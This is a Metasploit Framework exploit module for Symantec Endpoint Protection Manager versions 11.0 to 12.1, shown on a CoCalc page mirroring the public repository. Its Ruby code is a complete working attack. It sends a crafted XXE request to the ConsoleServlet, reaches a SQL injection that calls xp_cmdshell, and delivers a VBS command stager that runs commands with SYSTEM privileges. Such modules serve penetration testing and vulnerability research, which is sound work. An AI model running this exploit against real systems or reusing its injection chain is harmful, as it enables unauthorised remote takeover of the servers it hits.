CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6


7
class MetasploitModule < Msf::Exploit::Remote

8
  Rank = ExcellentRanking

9


10
  include REXML

11
  include Msf::Exploit::CmdStager

12
  include Msf::Exploit::Remote::HttpClient

13


14
  def initialize(info = {})

15
    super(update_info(info,

16
      'Name'           => 'Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution',

17
      'Description'    => %q{

18
        This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager

19
        versions 11.0, 12.0 and 12.1. When supplying a specially crafted XML external entity (XXE) request an attacker

20
        can reach SQL injection affected components. As xp_cmdshell is enabled in the included

21
        database instance, it's possible to execute arbitrary system commands on the target

22
        with SYSTEM privileges.

23
      },

24
      'Author'         =>

25
        [

26
          'Stefan Viehbock', # Discovery

27
          'Chris Graham', # PoC exploit

28
          'xistence <xistence[at]0x90.nl>' # Metasploit module

29
        ],

30
      'License'        => MSF_LICENSE,

31
      'References'     =>

32
        [

33
          ['CVE', '2013-5014'],

34
          ['CVE', '2013-5015'],

35
          ['OSVDB', '103305'],

36
          ['OSVDB', '103306'],

37
          ['EDB', '31853'],

38
          ['URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt']

39
        ],

40
      'Arch'           => ARCH_X86,

41
      'Platform'       => 'win',

42
      'Targets'        =>

43
        [

44
          ['Windows VBS Stager', {}]

45
        ],

46
      'Privileged'     => true,

47
      'DisclosureDate' => '2014-02-24',

48
      'DefaultTarget'  => 0))

49


50
    register_options(

51
      [

52
        Opt::RPORT(9090),

53
        OptString.new('TARGETURI', [true, 'The base path', '/'])

54
      ])

55
    deregister_options('CMDSTAGER::FLAVOR')

56
  end

57


58
  def check

59
    res = send_request_cgi(

60
      {

61
        'uri'   =>  normalize_uri(target_uri.path),

62
        'method' => 'GET',

63
      })

64


65
    if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/

66
      return Exploit::CheckCode::Appears

67
    end

68


69
    Exploit::CheckCode::Safe

70
  end

71


72
  def exploit

73
    print_status("Sending payload")

74
    # Execute the cmdstager, max length of the commands is ~3950

75
    execute_cmdstager({:flavor => :vbs, :linemax => 3950})

76
  end

77


78
  def execute_command(cmd, opts = {})

79
    # Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.

80
    command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"

81


82
    # Generate random 'xx032xxxx' sequence number.

83
    seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"

84


85
    soap = soap_request(seqnum, command)

86


87
    post_data = Rex::MIME::Message.new

88
    post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")

89
    xxe = post_data.to_s

90


91
    res = send_request_cgi(

92
      {

93
        'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),

94
        'method' => 'POST',

95
        'vars_get' => { 'ActionType' => 'ConsoleLog' },

96
        'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",

97
        'data' => xxe,

98
      })

99


100
    if res and res.body !~ /ResponseCode/

101
      fail_with(Failure::Unknown, "#{peer} - Something went wrong.")

102
    end

103
  end

104


105
  def soap_request(seqnum, command)

106
    randpayload = rand_text_alpha(8+rand(8))

107
    randxxe = rand_text_alpha(8+rand(8))

108
    entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?"

109
    entity << "ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"

110


111
    xml = Document.new

112
    xml.add(DocType.new('sepm', "[ METASPLOIT ]"))

113
    xml.add_element("Request")

114
    xxe = xml.root.add_element(randxxe)

115
    xxe.text = "PAYLOAD"

116


117
    xml_s = xml.to_s

118
    xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding

119
    xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding

120


121
    xml_s

122
  end

123
end

124


125


126